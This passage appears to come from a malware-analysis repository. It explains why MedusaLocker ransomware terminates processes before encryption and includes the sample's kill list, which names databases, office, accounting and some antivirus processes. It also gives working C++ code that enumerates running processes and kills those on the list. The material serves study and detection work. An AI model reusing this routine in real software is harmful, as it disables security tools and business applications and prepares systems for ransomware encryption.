This repository contains the analysis reports, technical details or any tools created for helping in malware analysis. Additionally, the repo contains extracted TTPs with code along with the detection rules
Ransomware often terminates certain running processes before encryption to ensure maximum impact and effectiveness. This is done to avoid interference by stopping security software and system monitoring tools, thus preventing detection and interruption during the encryption process. Additionally, by terminating resource-intensive applications, such as databases and email servers, ransomware ensures it has sufficient system resources to operate efficiently. Furthermore, some applications lock files while in use, preventing them from being encrypted. Stopping these applications allows the ransomware to access and encrypt these files. This strategy helps the ransomware maximize its chances of successful encryption and increases the likelihood that the victim will pay the ransom to regain access to their data.
In case of MedusaLocker Ransomware, it also contains a pre-defined list of processes that it looks and kills before launching the encryption operation.
const std::vector<std::string> processNames = {
"wxServer.exe",
"wxServerView",
"sqlservr.exe",
"sqlmangr.exe",
"RAgui.exe",
"supervise.exe",
"Culture.exe",
"RTVscan.exe",
"Defwatch.exe",
"sqlbrowser.exe",
"WINWORD.EXE",
"QBW32.exe",
"QBDBMgr.exe",
"qbupdate.exe",
"QBCFMonitorService.exe",
"axlbridge.exe",
"QBIDPService.exe",
"httpd.exe",
"fdlauncher.exe",
"MsDtSrvr.exe",
"tomcat6.exe",
"java.exe",
"360se.exe",
"360doctor.exe",
"wdswfsafe.exe",
"fdlauncher.exe",
"fdhost.exe",
"GDscan.exe",
"ZhuDongFangYu.exe" };
Processes are Enumerated with famous process enumeration APIs: CreateToolhelp32Snapshot, Process32First, Process32Next. First we will retrieve the snapshot of all running processes using CreateToolhelp32Snapshot, then we will retrieve the first process and loop on next processes.
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hSnapshot == INVALID_HANDLE_VALUE)
{
std::cerr << "Failed to create process snapshot\n";
return -1;
}
PROCESSENTRY32 processEntry;
processEntry.dwSize = sizeof(processEntry);
if (!Process32First(hSnapshot, &processEntry))
{
std::cerr << "Failed to retrieve first process\n";
CloseHandle(hSnapshot);
return -1;
}
In this section, we will loop through all running processes recorded in the snapshot and match the names of those processes with the pre-defined list of processes that we have. If a match is found we will terminate that process and continue with the loop.
do
{
HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_TERMINATE, FALSE, processEntry.th32ProcessID);
if (hProcess != NULL)
{
std::string processNameStr = convertor(processEntry.szExeFile);
for (const auto& name : processNames)
{
//std::cout << "Enumerating processes" << "\n";
if (processNameStr == name)
{
std::cout << "Terminating process " << processNameStr << " (PID: " << processEntry.th32ProcessID << ")...\n";
if (TerminateProcess(hProcess, 0))
{
//std::cout << "Process " << processNameStr << " terminated successfully\n";
processes.push_back("Process Terminated: "+ processNameStr);
process_disruptor++;
}
else
{
std::cerr << "Failed to terminate process " << processNameStr << "\n";
processes.push_back("Failed to terminate: " + processNameStr);
}
}
else
{
//std::cout << "Process name not matched" << "\n";
continue;
}
}
CloseHandle(hProcess);
}
} while (Process32Next(hSnapshot, &processEntry));
Find Complete Code Click Here: Shaddy43/MalwareAnalaysisSeries
Intended for educational purposes only!